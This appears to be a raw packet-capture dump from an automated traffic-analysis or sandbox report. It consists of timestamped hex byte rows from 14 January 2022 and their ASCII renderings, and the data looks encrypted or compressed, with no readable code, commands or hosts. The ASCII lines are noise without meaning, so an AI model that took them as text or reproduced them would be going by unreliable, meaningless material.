                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2617INData Raw: f1 7c 11 2b b0 79 0c 5b c1 01 68 4a 1a e2 46 ac 8e 90 b9 d7 87 ec cc 31 3e 99 62 4f 88 bb 00 17 53 77 1a 8f a4 9c a1 b6 c2 51 bb dc 75 59 66 0b 50 2b 4a e0 ff e3 ee b1 36 11 4e 83 51 be 01 b2 27 67 bf db 7b 5a c1 f4 90 e9 13 f4 bd 02 92 56 58 c5 93 c1 2f 8c fb 3b 58 a2 f0 f0 c4 67 6d ef 2e ed a1 e7 58 7f 67 2f 21 c5 90 4a de 94 b6 a4 12 aa 65 18 f2 56 cf b1 46 15 51 93 0a 8d 3b 37 89 d1 75 da b1 37 29 48 54 55 da 09 07 ce cd d7 3a a1 d6 fa 88 bc dd 83 98 c4 ec 04 d6 aa eb 72 e7 1a 8e 4b d2 85 13 e1 a9 f8 83 c0 a5 8c 6f e1 c7 be 07 e5 a3 43 0f 1a 92 36 68 db c5 af c1 cd 32 02 91 3f aa 5b 9c 5b 90 c0 62 41 74 a0 a2 03 d1 e5 94 ea 41 55 b5 d2 56 16 dd ed 42 31 46 3b e6 e7 6b c1 c7 89 06 ae 3c b4 e6 c8 17 92 95 89 16 07 e7 f2 68 4a 32 3e 47 8e 4b e1 a1 0d c9
                                                                                                                                                                                                    Data Ascii: |+y[hJF1>bOSwQuYfP+J6NQ'g{ZVX/;Xgm.Xg/!JeVFQ;7u7)HTU:rKoC6h2?[[bAtAUVB1F;k<hJ2>GK
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2633INData Raw: db 75 1e b1 0f d0 77 eb a9 bb cb ad 8d da 19 32 77 8a a3 17 d9 dc 14 9c 48 17 80 5a 89 9e f1 5e 68 cb 6d bb 89 9f c8 f9 95 3c 30 71 3d 3e 32 bc 71 5d 9b e5 82 28 13 6a 5f 9a 65 d2 da bc 13 1b 4e 2e 9f 1e 5d e7 a9 d5 d3 4d 51 93 f2 4d 3a 32 14 4e 48 4d f6 d8 7e 76 b8 b1 6f 15 2e e2 55 96 e5 61 bb 7f b9 b1 01 00 c3 a1 f0 12 99 b2 cf 48 c2 d3 d3 56 77 94 16 c3 31 fc 46 81 c4 60 54 4c dc 35 e7 66 38 25 f1 9b bb 9f ab 1b 83 4b 2a 10 db cc ba e8 06 d1 aa 09 12 04 7c 34 b5 8a f9 5b 38 8a 30 c1 d3 33 8e 92 a0 c8 02 f6 12 5e 01 b2 93 b4 dc ce 4d ef 48 92 63 91 18 39 a8 b7 e6 a9 fc 11 9e e0 01 2a e8 03 32 8e dd 87 06 db 2a da 33 87 6c 83 bf c2 21 6c ba 08 22 77 eb c7 c2 81 a7 0a 73 36 cc 22 ca ed d1 7b e6 22 2b 09 a1 46 db 22 59 29 03 6a 13 18 fe 3e e8 ed c4 5d 73
                                                                                                                                                                                                    Data Ascii: uw2wHZ^hm<0q=>2q](j_eN.]MQM:2NHM~vo.UaHVw1F`TL5f8%K*|4[803^MHc9*2*3l!l"ws6"{"+F"Y)j>]s
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2649INData Raw: 41 60 cc df 98 e3 60 66 da 17 5c 59 40 f3 a7 56 dc b6 1b ef a8 5a 97 09 4c ed ab db 5e 4f 2d 70 78 75 16 63 2f 08 ce 13 f7 58 73 a2 6d 5d d0 eb a8 ea c8 f9 68 d7 ec 5e 66 05 ba 45 5a 74 f1 9c 93 1c 0f e8 1f 19 a9 b0 44 0f 64 ee e6 34 c7 91 1c 9d 98 b0 31 ea 02 24 9d f4 7b ce d4 d6 b0 61 58 e5 2e 05 36 63 c0 1b 32 42 1c bc f2 a3 a7 ba 62 0b 47 81 0d 7a 99 da 1e ca ad 36 ff a4 fc 29 24 18 4a 2d 5d 8d d5 90 d3 4f b0 05 27 bb be d6 41 64 86 f4 64 9c 7f 18 cb ec e8 4e 2a 83 13 9e 55 6d 24 bb b1 dc 5b a9 66 8d 5f 29 0f 58 47 78 4c 43 72 c2 ad 3e 3a 17 75 c6 75 2f 75 9f 24 31 be 6d e5 cf 3e a2 c6 50 e8 15 fc 04 96 bf 10 0b b4 9f 82 1b 69 9a 9c b8 d1 b9 0e 39 26 5e ed 67 d4 0e 57 5f b7 14 19 53 52 0a 93 87 84 dd ac a5 04 d3 d8 48 24 47 33 53 7e 34 f2 ab 94 ef df
                                                                                                                                                                                                    Data Ascii: A``f\Y@VZL^O-pxuc/Xsm]h^fEZtDd41${aX.6c2BbGz6)$J-]O'AddN*Um$[f_)XGxLCr>:uu/u$1m>Pi9&^gW_SRH$G3S~4
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2665INData Raw: 0f 16 5b 44 e3 7a 82 3c 86 0a 2a 92 1f 3d bd 9f bb ec 7d c4 3b 47 24 9c 07 2a bf 00 2a b2 97 b4 04 c5 f9 d3 95 ed df 76 8e fe 95 9e 20 4c 3c 90 c1 47 7f f2 ac e2 7a cb 0b 06 50 4b 35 1c a2 1a ea 4e c9 b7 a7 10 03 3c 51 09 f4 01 2c 95 56 bd b2 be be 30 5c eb b0 3e 85 58 12 94 5a 05 38 fa 0c 4b 03 6a e8 24 a2 ee f6 8d 72 05 08 40 74 05 f7 96 90 4b 93 08 65 2a 00 35 8f 5c 09 9c d6 44 40 2c 09 99 c0 0b b5 13 65 97 58 ff 5b e8 b5 1c bd 3a c4 6e e2 1d a1 b3 3e 33 a2 9d 8b 3b 0c 31 2d 63 a8 d3 a9 c4 7a ad 5c 8e f2 f4 1a 6a 41 16 3d 21 87 3a 81 25 56 02 df 58 36 ba 5f b9 84 75 b5 c9 cc 92 a7 03 7e aa 4e 8e ea c7 3d 25 bb a6 b8 d4 96 4f 78 11 2f 80 8a 98 12 fc f9 7e d5 4e eb aa 70 69 19 eb c7 05 c0 c9 4c f4 47 90 0e 66 34 3c a9 d5 aa 35 ea 4f c7 20 f5 83 94 c4 df
                                                                                                                                                                                                    Data Ascii: [Dz<*=};G$**v L<GzPK5N<Q,V0\>XZ8Kj$r@tKe*5\D@,eX[:n>3;1-cz\jA=!:%VX6_u~N=%Ox/~NpiLGf4<5O
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2681INData Raw: ef 85 43 ed 8b 2b a7 53 64 7f 1b 25 3f 41 59 d2 a7 17 e5 f0 dc 12 3e 31 bf b8 ca c4 7e e7 c5 56 37 ec 4f c4 a2 57 ee 43 13 55 ca 6c d9 b5 37 d0 ad c2 53 42 9a e6 1b f2 88 78 a5 41 84 52 6c 87 17 d8 48 f5 f6 48 e2 79 27 42 d7 9f 26 e1 c1 41 66 1b 59 d6 3c 3a 8e bc dc fa 2f 1f e3 ff 01 cd 26 2b a8 f1 a9 82 14 8d 96 f1 cc b7 65 d1 c9 d5 4e 1a d8 85 74 13 ef 04 cf 29 ec 56 4e e2 12 ff 5c 3a 55 f3 5b d0 cb d3 d3 d3 66 8b b7 24 48 8f d1 c2 47 c3 2b f1 77 20 10 26 76 55 09 da 7a 9f 65 d3 fd 00 5d 63 6e 75 23 ea f8 13 fc ef 68 e8 54 01 54 8f f2 73 06 11 f2 6d 48 2d 3b d9 9a f5 bb f0 17 cf 26 2f 09 a2 02 54 2e 57 cf e9 34 9e 2e 0d dd de 92 dd 3e 93 6f 52 38 50 b8 37 22 f2 6a 51 f9 7f 12 a5 6e e6 09 2e 69 47 7a 18 65 f5 1c fc ef 96 4d 21 1e 8e 2d 58 86 b5 5f 25 2b
                                                                                                                                                                                                    Data Ascii: C+Sd%?AY>1~V7OWCUl7SBxARlHHy'B&AfY<:/&+eNt)VN\:U[f$HG+w &vUze]cnu#hTTsmH-;&/T.W4.>oR8P7"jQn.iGzeM!-X_%+
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2697INData Raw: e1 01 0a 52 77 fd 5e f4 eb a2 7d db e7 33 aa 5f b7 c7 0a cc eb 15 a3 91 ab 33 28 d5 36 30 7a ae 43 cd 10 c3 b3 c2 d7 4b 82 11 8c ad 12 fb 7a 82 13 9b 24 15 c2 24 2d e2 e4 18 7d 31 90 fc 2f 9f 8c 7d 4b a6 6c d8 a1 e8 44 d2 66 29 02 76 19 d3 60 22 13 71 ca b9 8e ea cd b3 ef 91 4f 22 e5 44 11 42 90 7f 27 74 68 ad a6 bd 1b 26 c4 3f 46 74 f3 6f ec 4c 26 bf 7c f6 7c 66 e1 0a 4e 6d 90 c2 bb 6f 58 28 08 3a d4 81 7d a3 ed 3c 38 26 e4 a6 99 3b c6 b7 ad 92 db 6d 37 7f a5 56 aa 44 90 6a e2 f5 ef 55 ea 22 1a 21 7a b0 c0 7a 67 1d 53 73 59 c4 5e 7d 77 dd ef f7 55 c4 67 bb 88 fc 31 b8 90 0e f4 06 32 0b 8b 37 b0 54 5d 9d ee ce 8d 61 61 58 54 7b 9d eb 4f 62 fb bc ba 08 76 65 c6 da 0f 25 e4 cb c0 8b 9c b6 26 97 22 89 e8 24 65 dc 92 eb c7 1f f3 7b 87 b4 63 27 61 45 d2 a0 64
                                                                                                                                                                                                    Data Ascii: Rw^}3_3(60zCKz$$-}1/}KlDf)v`"qO"DB'th&?FtoL&||fNmoX(:}<8&;m7VDjU"!zzgSsY^}wUg127T]aaXT{Obve%&"$e{c'aEd
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2713INData Raw: e9 82 04 f4 03 76 84 ef b4 56 51 c1 24 02 85 36 ac 8b 00 f2 59 1d 46 d8 2f 4b 0b f3 70 95 84 ef fa 7d 67 fe 1a 56 74 09 f3 18 b5 60 eb 50 58 50 b4 50 42 17 d3 8d 4b 5c f6 af 38 eb 8d b7 e2 06 67 1e 17 7b 06 35 60 64 55 ec ae f0 8e b8 45 03 ae 12 77 13 96 a9 23 25 d0 c7 00 8a 62 ca 79 57 d2 13 70 77 b9 1c 5f 94 35 a0 ed 8a 73 58 63 73 02 14 6c f2 85 77 21 00 2a 17 33 4c eb 26 be a2 0c 4b 93 64 0e f2 92 47 5f 8c 10 a7 cd 4f c2 84 bb ff 7b e1 63 36 45 9e 7d 96 51 06 3d 96 66 81 d6 1e d6 24 45 d8 d3 ce bc 04 80 46 68 af 8c cd 34 49 30 77 a5 8e b6 20 a2 71 eb f6 75 e7 c6 9a 37 eb 7a e7 2e 02 e0 b0 38 68 08 ef e4 ae c7 a4 7d f8 f6 c6 7d 19 da ff a8 a9 4d 77 1c 0e ef d6 14 e6 4b ea 28 c8 f6 f2 09 c9 f3 76 f2 e6 15 a0 50 f7 a9 c2 92 1b fa 6a 7d 58 c7 a1 35 cc 64
                                                                                                                                                                                                    Data Ascii: vVQ$6YF/Kp}gVt`PXPPBK\8g{5`dUEw#%byWpw_5sXcslw!*3L&KdG_O{c6E}Q=f$EFh4I0w qu7z.8h}}MwK(vPj}X5d
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2729INData Raw: 28 ce ca d7 8d 0d d0 2d 49 e3 11 c0 21 09 1f 80 e3 c8 00 76 a1 2e 19 8c 9d d7 13 34 ce c7 2a b0 c8 62 ca fb d9 47 2c d0 23 84 72 e7 ff ff 8e 58 b2 7e d7 a9 9b 93 f7 31 bc 8f 17 d4 fc 45 e2 09 07 92 4c 6b e7 4f 42 f7 30 83 71 d3 97 86 8f a7 4f 15 d7 58 18 81 af 50 9d c2 9f 8d 2c 5f b7 80 86 7e 88 ca d2 d6 2d fa 6e 1d 67 98 35 e0 8e 68 ca 17 c3 2c 41 93 e0 a0 d7 3a b8 91 a3 f1 d0 93 08 88 8d e9 25 9b 29 1a 59 c6 dd f5 0c b9 c8 0e 87 a4 f9 c3 b1 9f 5a 7e 80 80 69 cd fe 3b 0f 7e 56 be 31 fb 96 d3 92 f7 fd 4d 17 35 9f 0c e4 8e ab 95 4b a1 5f 7c 9a 73 a9 16 44 b4 6f 78 1b 7e bd 7d 9b 80 37 6e 0e 85 b1 84 74 31 36 1a bd 39 95 42 e1 d1 5c fb 78 ed 6e 7e 84 f4 ba f6 11 6f 1b 13 e7 c3 bd c5 cc 4b dd 0f 11 b1 71 d5 51 11 4c 70 8b 26 f2 af 56 26 f1 7d 77 cc fc dc 17
                                                                                                                                                                                                    Data Ascii: (-I!v.4*bG,#rX~1ELkOB0qOXP,_~-ng5h,A:%)YZ~i;~V1M5K_|sDox~}7nt169B\xn~oKqQLp&V&}w
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2745INData Raw: 2a 47 c5 71 d1 ca 39 0d d2 f7 33 00 f5 d5 b5 69 e1 cc 61 c4 6a 55 76 4b 25 74 73 50 91 5c 91 05 88 36 40 93 f0 62 de 11 88 8d c4 65 2d 9a d0 d4 dd 68 a4 bb 17 4b 86 e3 ec 18 b5 8f c2 2e a2 2b e4 9d 44 d2 93 97 09 f3 6c 92 42 04 11 3b f8 45 b1 fb 7e 6c c5 98 51 26 a6 41 24 04 92 70 8e da 91 f5 ea 4d fe ad 81 6c e5 9d 63 dd f2 f5 68 63 ac e5 39 c9 e2 c2 7c 5e eb 10 51 d3 cb ae 84 e1 0b a9 c1 e3 42 a4 6e d6 d3 7b 74 01 16 98 b4 bb 47 2e ba da b7 d5 68 a8 98 e3 a4 5f 68 5d b0 1f fc 1e 46 12 cd ca 2a 9b 46 1c 0c b4 09 9a 55 53 14 d0 c9 12 90 f1 6f 0b 2e 50 d5 9e 0f 5e 7d 42 cb ca e8 f3 23 1d f0 93 f1 dc f7 a8 c3 ee 5a e5 fc 60 68 44 86 5c 50 7d 9c 3d c9 82 f9 3d e0 15 70 04 1c 5c 4f 89 19 96 99 a3 45 d3 c2 d5 8b 89 f5 67 7f 6b 0b ca ff 2a 10 d1 fc bf 46 f9 35
                                                                                                                                                                                                    Data Ascii: *Gq93iajUvK%tsP\6@be-hK.+DlB;E~lQ&A$pMlchc9|^QBn{tG.h_h]F*FUSo.P^}B#Z`hD\P}==p\OEgk*F5
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2761INData Raw: d3 4b 71 dd 91 77 5a 99 fe 42 46 cb f4 ed 87 3c 85 4c 2c 0e e5 cf 4a b5 37 b7 3a ec 65 71 e0 ad 77 28 ac 5e 6f a4 bf 3b cc 9a 13 e5 fc 57 f5 b2 66 4a 6b e8 01 36 9f 6b dc 71 9e 7e 36 c6 2e 4e 3d f0 cf aa 4c 3a f2 3a b8 3a 5f f1 31 72 fd 7d 72 52 ec 97 cc df 79 d4 a4 1e d9 ad a2 f1 ee 54 b3 89 64 6a 06 12 ea d7 2d 86 66 38 21 b3 38 67 06 3e 14 86 71 55 a1 8a 54 f7 48 91 82 fb 88 bb d4 f3 e2 8e 49 e9 95 1c 79 1d 23 c2 ec f1 6d 6b 1f 11 03 68 63 3e 71 cb 67 b4 5b d8 76 d4 06 ed 62 1f b3 99 90 0c 61 87 42 d7 ac 6f b4 5d f7 e1 78 01 7f 47 25 e8 79 69 66 b5 f2 9a 0d f7 db fa 2e 6d 8a e9 03 67 c6 b5 79 2f 18 a7 fe 78 21 ec 39 28 40 73 6f dd 7c 1e 08 1c 37 a5 e5 14 c4 0b f3 4c bc 5d 99 9a 95 77 fe a4 58 45 6b 1c bc b2 42 22 d8 db 43 a2 97 17 62 96 ee c9 11 9d 49
                                                                                                                                                                                                    Data Ascii: KqwZBF<L,J7:eqw(^o;WfJk6kq~6.N=L:::_1r}rRyTdj-f8!8g>qUTHIy#mkhc>qg[vbaBo]xG%yif.mgy/x!9(@so|7L]wXEkB"CbI
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2777INData Raw: 53 f4 56 99 30 4e 17 6d 37 ec ba 90 5c 5b 2e bc 47 22 f0 3b f9 6c e2 ef e3 b9 3a 5e 9c 3a 50 12 e8 85 a2 5f d3 b6 79 40 0b a8 fd 1d 89 d6 29 a4 9c 22 22 2a 15 0b 0f 77 b4 13 83 b8 f9 8e b0 cf 80 ed 1a cb 57 8c f3 c6 bd 80 2b 4e be 45 25 99 47 ea 05 52 2c 12 a0 af e9 3a c8 ca 33 c5 9d c4 cd 63 fd 5c 81 ea f4 6c 86 fc 63 8d d9 91 82 63 3b 8d 9f b8 83 c1 d5 e0 84 b6 7e 3a ed c3 79 3f 28 51 3f 62 a2 aa af ae 27 4c a0 1d 9d 70 5d 10 9c 55 cf 75 c8 2d 70 ee c7 f3 1d 44 60 cb 28 89 d1 0a e8 e3 b6 6a 1f 51 46 f8 66 fe 9c 2d 84 f9 ab 71 a5 ce d6 91 67 69 06 58 66 fa 4a fe 50 87 33 97 04 f4 d4 19 1a 19 13 26 1a aa 76 3b e9 c5 89 c0 48 c7 73 bb e4 34 7c e7 4c 5d 45 82 8d 15 27 e1 4c 04 97 17 de ee 68 5f b4 43 93 d9 5a 77 07 3b 87 d6 d4 10 03 a3 3f 70 53 6e f8 07 3c
                                                                                                                                                                                                    Data Ascii: SV0Nm7\[.G";l:^:P_y@)""*wW+NE%GR,:3c\lcc;~:y?(Q?b'Lp]Uu-pD`(jQFf-qgiXfJP3&v;Hs4|L]E'Lh_CZw;?pSn<
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2793INData Raw: a0 24 ed f6 c6 91 33 f5 14 45 71 f6 b2 ed 86 b7 52 ba ee b9 2c 7e 1a 41 7b ac 8a 85 82 57 1a fa 5f 4f f9 e8 35 fd 91 0b fa 11 49 f6 98 bf f0 29 36 cb 8e c7 b6 1a 71 f3 c4 b5 c1 09 5e db 49 25 9e e4 00 ec 6d 5a a5 16 74 0a eb d7 ec de 2f 84 30 7d 2e 17 74 ce 72 ae f6 a5 f6 bb cf 9a ac 1a 31 6c c2 6c f1 8f 2f 8e 61 26 f9 ed b1 66 ad a6 d3 c0 9b 61 a8 08 92 c2 0e 4e 3b a3 06 1c c0 66 a7 95 f1 3e 75 75 b8 01 a9 a8 49 a1 ef 52 90 bd 51 00 44 be ba 98 d7 50 7a a8 7f ce 5d c1 97 0a 1d 5b e8 a3 57 03 d2 55 81 d2 65 a1 da e5 b2 f0 6b de 82 a4 66 58 d4 6f d1 a9 ba 99 90 4d c2 f8 7e 13 bd 4a 58 15 48 39 78 e4 b9 6a d8 7e 85 2a c0 09 0d 9c a4 04 88 e8 1a 6e ec a9 82 fe 0f 3b 11 d9 41 0c e5 cc a6 16 f2 dd d5 89 42 91 b8 a8 7a c8 60 c1 f1 27 83 da 27 d4 6a ca f3 8c d4
                                                                                                                                                                                                    Data Ascii: $3EqR,~A{W_O5I)6q^I%mZt/0}.tr1ll/a&faN;f>uuIRQDPz][WUekfXoM~JXH9xj~*n;ABz`''j
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2809INData Raw: d3 22 4c 4d bb 76 ad 1f 25 7c 15 df 5a 93 54 cd ff 78 96 96 be c7 bf ed 3b 86 e5 d0 e3 8a 8d b6 e5 a1 8e 9c c6 a7 1f db c5 72 5c 5f b3 f4 2e a9 33 6a 40 fe 6c f2 01 4a 15 78 c0 07 35 f1 e0 4f 6d a7 e6 c8 2d b3 8a d4 e9 eb 14 a2 e5 03 b6 12 3a de 8b cc 63 17 a3 a8 65 9c 06 4e 27 45 fd a3 20 c1 60 36 0e bf b4 c2 f7 92 b0 8c 47 2d 30 28 ff 61 97 e3 df 7a 96 b9 51 49 e8 35 5a 22 9e cb 14 fb 83 8d 5a 0d 13 f6 4e ec b1 39 05 e4 4e c4 63 d7 32 ff 33 50 ed 2c 9d 51 88 61 33 70 a5 ae 1c 3e 84 f2 2e a4 0e 56 b8 4c e5 29 31 09 57 eb df d4 e4 b7 fd e6 31 65 19 96 62 2d 6a 4d 37 e7 2b ba e9 59 ee 9e 82 af 53 dc 62 d7 e4 7d c4 8d a3 d3 bf b4 8a 21 44 10 ba 16 8a 28 59 5d 4b 0f 4c a8 49 ac 63 91 c4 16 48 66 9f 14 02 e9 2a 19 2c fe 97 76 7f 33 58 ab f5 5a 9a 1f 36 49 2b
                                                                                                                                                                                                    Data Ascii: "LMv%|ZTx;r\_.3j@lJx5Om-:ceN'E `6G-0(azQI5Z"ZN9Nc23P,Qa3p>.VL)1W1eb-jM7+YSb}!D(Y]KLIcHf*,v3XZ6I+
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2825INData Raw: ff 76 43 03 ac 20 12 85 38 45 18 f4 32 c5 69 44 ae cd 65 d7 bd f1 7d 15 f7 ac e9 82 ff 16 e6 de ff cb c2 8c 1b 40 7a 4d 13 d7 b9 56 08 c4 65 4e db 0e 39 68 2e a5 6e df 95 7c 1d 5f 17 76 85 22 4d 52 bb f5 c1 7b 59 5e 43 89 83 05 8d a5 cb 41 e7 c1 52 89 17 54 e7 47 01 75 af 94 4e 3e 7f 5d 3c dc 10 92 42 8c 4d 3b a0 db df 7b df 2e 8f dc b5 3c 08 3b 35 3b 13 ac 2b 29 34 d3 d8 50 9f 6e 55 17 9c 9c c2 e0 ae fa 4d 1c 90 6b 90 52 bc 7b 2c 60 ea 46 92 d2 e4 15 03 04 52 4a de f5 c6 89 13 e2 c2 1b 55 64 0b 3c e9 49 5a 68 a9 f6 9a 75 5b 3c 1c 11 68 e7 37 d9 cf 93 7a 0f 7f 09 ad c2 fe 1f 91 a2 45 40 e6 b8 7a e2 13 62 39 55 8c 9d ce ea df 29 a1 d2 8f c8 69 90 59 57 6b 3a 8c 5d 69 2c f9 5e 44 59 ec 0e 8a be 1a f4 64 db bc 26 24 6e 65 66 08 ff 85 80 6c 9f 40 75 34 bb b0
                                                                                                                                                                                                    Data Ascii: vC 8E2iDe}@zMVeN9h.n|_v"MR{Y^CARTGuN>]<BM;{.<;5;+)4PnUMkR{,`FRJUd<IZhu[<h7zE@zb9U)iYWk:]i,^DYd&$nefl@u4
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2841INData Raw: a4 ce cf 58 32 8d 9c 81 47 d7 f2 4e a0 60 2c 94 7c fe 57 46 ca 4e d1 86 c5 98 76 d9 5a b3 15 5f bb b9 70 91 4f 5d a5 58 6c c9 0e b3 ac 84 57 2e 3c 7b 0d 4f 97 11 74 f5 6e 4c a8 70 2e 1f 86 97 5d 9e 68 00 a0 03 72 12 c3 a3 3f c0 09 70 32 5e 34 de 02 86 1a a3 82 42 cd 75 de 6a 48 99 4a 6e d4 eb e8 c1 97 a7 98 da 54 5a bb 19 aa 7f 88 42 f0 4e 18 bc e1 29 1a 66 7a e5 53 66 81 e4 f7 c6 2d 03 d2 d0 ff 06 fa 90 e1 fa 94 7b a4 72 47 91 41 37 1e 11 43 39 19 75 54 66 06 b9 e6 95 e6 87 49 28 4b fd f2 52 04 79 03 ae 2d 74 c6 03 c2 96 20 cc 9e d0 85 13 dd a3 35 29 4a 43 9a 87 ae 62 9c 6c 9b 09 03 fa 55 dc 53 48 4d af e5 67 3b 75 65 66 c1 9d 5f 01 ea 5a 5e 4e 53 78 bc 6b 4b 9e ea 73 e9 2e 01 34 9f 2b 87 43 e6 ea 37 ec a2 0b 83 c8 1b 47 df e5 97 19 4b b8 dc d6 20 46 63
                                                                                                                                                                                                    Data Ascii: X2GN`,|WFNvZ_pO]XlW.<{OtnLp.]hr?p2^4BujHJnTZBN)fzSf-{rGA7C9uTfI(KRy-t 5)JCblUSHMg;uef_Z^NSxkKs.4+C7GK Fc
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2857INData Raw: 77 9e 22 6f 54 d2 7f 0c fd b2 1d 78 95 ac 75 9a 82 76 9f ef 3f 58 ff 78 fd 6c 32 8e 39 0c 65 86 29 df d7 42 d3 e5 9a df 26 f5 13 79 17 23 10 8d 2f 71 76 8e 9f ed 40 07 d8 33 5b 82 1d c4 8b df 1d e1 f0 5e c4 56 6d 60 7a e9 48 d7 b3 06 73 be 19 f2 b5 48 1f df fe 11 71 24 c1 24 20 2c 8e eb ad 18 93 69 f2 a9 c4 49 b0 32 80 fa f3 24 fe 22 04 72 aa 8b 20 0b dc 54 d2 96 68 73 71 60 ca 80 a1 cb 7c 20 29 a6 bc f0 ae 70 0a b1 25 25 5c ec cf 37 b0 d0 a7 98 1b 26 41 d3 b0 e9 16 fc 9a 38 b6 84 b9 e0 4a b2 22 66 90 5c f1 aa 24 d2 bc 20 f1 39 43 a8 4d 67 9a 61 07 db c5 38 34 fd 9f 5a 01 b9 9a 22 a9 8f 22 c1 03 ce cb a7 fd 6e 84 65 64 32 da 72 27 12 0e c7 61 fb f4 b3 1d bd 49 94 d9 69 a5 6b ab 4b 86 c6 5e a5 b0 22 9a 26 9b ba cb c3 d8 ae fb c8 8d e4 4f c6 99 c4 ff 1d de
                                                                                                                                                                                                    Data Ascii: w"oTxuv?Xxl29e)B&y#/qv@3[^Vm`zHsHq$$ ,iI2$"r Thsq`| )p%%\7&A8J"f\$ 9CMga84Z""ned2r'aIikK^"&O
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2873INData Raw: 65 90 3e ad 9c d1 3d 8d ba 2a 6a 2f 4a eb 37 9f 78 e2 d1 2c c6 ee cc 45 f9 9f 9a c9 de 51 25 44 99 d9 fe e2 4e e7 38 5d ea f5 c5 78 ac 50 03 08 7b 49 c2 6f 09 15 bf ed 18 c9 81 5f 54 5f f8 54 83 df 33 37 9d c4 d3 24 d9 29 1f f6 6a be 58 0d 98 7a ee bb ea a7 f2 3e 96 a7 3f 97 43 1a 61 4e 56 91 7d 94 19 40 91 40 66 76 1a 4d a5 cc bc 3c c4 e1 33 74 f1 0b b0 21 8a 83 b9 33 16 f5 65 ce 3a d2 48 42 28 83 ed b0 1e c0 ec e9 09 0d 36 48 f6 2e 69 1d 78 d6 f5 6f e9 de cb 0d ba bf 33 d3 87 00 67 37 68 f7 1a c9 31 4e 6a 30 11 2f e2 3a 2f c3 17 be 80 f4 04 ef d5 41 b4 d5 23 fb 8b 8a 04 2e 68 71 9f c1 e2 4f 63 5c 89 94 97 72 ef 27 30 2a b3 d2 ca 44 21 9d 96 29 8c 6b 09 cc 62 ab 19 6b e3 45 a8 74 f6 1c 5d 6f 70 9c d9 8d 6c 39 1a 06 b0 4c 05 38 32 70 09 01 36 84 71 bd 45
                                                                                                                                                                                                    Data Ascii: e>=*j/J7x,EQ%DN8]xP{Io_T_T37$)jXz>?CaNV}@@fvM<3t!3e:HB(6H.ixo3g7h1Nj0/:/A#.hqOc\r'0*D!)kbkEt]opl9L82p6qE
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2889INData Raw: a4 da f0 51 c5 d4 d9 ea 72 67 ef 9a db f2 13 b0 5a 6b 77 68 24 2a 41 c4 f2 e2 01 69 c0 8f 43 22 91 b4 26 3e 9c f3 ce ce ac fa ed 24 06 26 76 7e 84 3e 0b 2a 83 a2 fc 78 91 9d 24 3e 60 20 8c a2 2c 77 62 d5 74 27 ca 64 9b f9 c7 d5 e9 fd 88 f7 ee 9b cd db 98 50 cd 82 91 26 d0 94 1c 4e 8f 08 20 7f f9 fa 61 41 87 2b e3 ae 98 e0 82 e1 9e 95 83 b2 d3 1f 87 45 b2 9d 5e eb 58 e8 9a 56 06 52 e9 91 2d d1 ac 02 7d 9b d3 df 32 a8 1c 62 10 2f 10 fa fa 3d 0f 66 6b a8 7b 43 d4 b6 1a db 85 23 f5 cf ed f6 29 28 96 53 60 ad 9f 16 8f 6e fb 55 bf 0c a6 05 f3 52 f2 2f 91 26 b7 4f 0b af b9 7c fd 31 70 29 9e 86 6d 76 8c 1d 35 81 84 f6 80 b3 81 9c d1 84 cf 8d d3 ed 81 dd 1f de 53 69 e6 5a 3f 20 96 72 32 2c 4c f6 4d 1b 46 e1 e5 5d df 69 8e d9 b2 e8 6e 24 b6 c1 ea d1 73 6c 88 75 ba
                                                                                                                                                                                                    Data Ascii: QrgZkwh$*AiC"&>$&v~>*x$>` ,wbt'dP&N aA+E^XVR-}2b/=fk{C#)(S`nUR/&O|1p)mv5SiZ? r2,LMF]in$slu
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2905INData Raw: 9b 5c 88 62 71 9b 9e 41 fa c3 0f 36 5e 04 b1 e7 26 96 6f 79 0e 19 8c 27 9b a1 52 6b 82 36 41 2a c0 aa ea 32 65 05 57 cd 34 ba 24 c3 a4 b0 45 d6 86 78 04 be 12 77 f2 a6 87 fd c1 88 24 82 ae 79 89 fa c8 af 0c 63 bc c2 31 98 44 c3 09 2b 54 1c 09 d5 f3 ab 73 e3 04 b9 c4 ff 08 c5 07 8f 67 20 f1 ed 91 2a 79 1b 24 f6 5a 62 ea 7b 42 56 72 fc 5c e9 a0 d4 70 03 e9 c7 7a 06 05 c1 99 43 a3 5f 54 c9 60 75 58 af ae b8 4b 06 76 2f 78 38 fc e1 a5 c5 0e c1 e2 22 4c 54 86 26 e2 79 b7 56 59 91 a8 68 e9 90 fb 44 b5 c6 1c 1e 79 fe fd 17 3c d1 67 fe 49 1c b2 7a 8b 34 56 79 d1 82 f8 3e 8e 7f 90 5b 06 8d 39 3e be f7 80 bc 2e ac 79 5c 5b 98 d1 e6 b8 ad 75 bf a4 c6 8e 41 c8 12 7a 56 83 e2 0e 07 e9 ff 44 1d 15 f4 96 5d 0f e2 c1 77 51 58 66 7b 46 81 af cc a8 c3 aa 55 73 4e c9 23 f5
                                                                                                                                                                                                    Data Ascii: \bqA6^&oy'Rk6A*2eW4$Exw$yc1D+Tsg *y$Zb{BVr\pzC_T`uXKv/x8"LT&yVYhDy<gIz4Vy>[9>.y\[uAzVD]wQXf{FUsN#
